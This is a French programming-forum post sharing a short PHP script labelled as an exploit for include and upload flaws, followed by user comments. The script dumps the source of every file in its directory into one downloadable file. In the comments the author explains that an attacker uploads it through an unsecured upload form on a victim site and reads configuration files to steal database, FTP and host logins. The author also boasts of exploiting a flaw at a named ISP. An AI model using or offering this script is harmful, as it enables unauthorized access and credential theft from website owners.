Exploi faille include & upload

Soyez le premier à donner votre avis sur cette source.

Snippet vu 19 248 fois - Téléchargée 27 fois

Contenu du snippet

faille include coté serveur, un clik=le code (lecture des fichiers!)

Source / Exemple :


<?

$dir=opendir('.');
$output="code.own";

$fpout = fopen($output, "a");

while ($file = readdir($dir))
 {
  if ($fpout)
  {
    if ((filetype($file) == "dir") || ($file == $output))
    ;
    else
    {
      $fpin = fopen($file, "r");
      if ($fpin)
      {
        fputs($fpout, "\n".$file."\n");

        while (!feof($fpin))
        {
            $line=fgets($fpin,1024);
            fputs($fpout,$line);
        }
        fclose($fpin);
      }
    }
  }
 }
 echo "<a href=$output> Show source :-)</a>";
 
closedir($dir);
fclose($fpout);

?>

Conclusion :


La securité avant tout!

A voir également

Ajouter un commentaire

Commentaires

cs_zzzzzz
Messages postés
408
Date d'inscription
lundi 16 décembre 2002
Statut
Membre
Dernière intervention
18 décembre 2012
-
Qui a mit 1/10 ? n'importe quoi c'est pas prk c marqué exploit qu'il faut marquer directement 1/10. moi je te remercie pour ta source et je met 10/10 por compenser, @+
OverDarck
Messages postés
116
Date d'inscription
jeudi 12 juillet 2001
Statut
Membre
Dernière intervention
23 juin 2005
-
Tout simplement exelent, d'une simplicitée certaine, mais d'une puissance extraordinaire !!!!
Merci bien !
cs_ceced
Messages postés
70
Date d'inscription
lundi 12 mai 2003
Statut
Membre
Dernière intervention
11 mai 2005
-
merci bien, lol, mais le but qd meme et pour dir la securité avant tout!
et tempis pour se qu'ils ont cette faille et qu'il ne la securise pas! faute du webmaster et non de la faille...
cs_zzzzzz
Messages postés
408
Date d'inscription
lundi 16 décembre 2002
Statut
Membre
Dernière intervention
18 décembre 2012
-
Par contre tu pourrai détailler le principe de l'exploit car je n'ai pas comprit le principe (:p) merci.
cs_ceced
Messages postés
70
Date d'inscription
lundi 12 mai 2003
Statut
Membre
Dernière intervention
11 mai 2005
-
Le principe est simple, cela marche seulement coté serveur, et comme tous le monde sais, il faut, réussir, a uploader se fichier, pour recuperer les login et passe grace a ce script ...(cela peut etre sql, lhost, ftp, ect..) Donc en gros, si le webmaster n'a pas securisé l'upload de fichier en surveillant les extentions, .php, ou autre, risque et perile pour lui!

Donc si tu sais ou le fichier de la source que j ai mi se trouve, il te fau tous simplement, executé le script, cad: http://www.victime.com/photos/code.php

enfait on s'est tous que les pages, config.inc.php ou autre dont la majorité utilise le nom de c page, dedans se trouve les connexions, cad, host, pass, login d'autre par tu sais que tu ne peu pas executé se script comme http://www.victime.com/site.php?page=http://tonsite/lescriptfailleinclude.php

ca ne marchera pas et si ca marcherai il n'y aurai plus du php :p...!

J'ai essayé pour wanadoo car wanadoo a une faille enorme fo l'exploité, je ne la donnerai pas ici...

VOILA le but de se script et de lire toute les source extention php dans tous les rep/

de plus il t enregistre sous le nom code.own donc t source des pages recupéré par le script tu peux soi les telecharger, soi les voir directement via l 'url (voir lien show source) possibilité d affiché les code en couleur

Voir aussi fonction showsource("page") si tu veu t amusé...

Voilou..

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.

Le fait d'être membre vous permet d'avoir des options supplémentaires.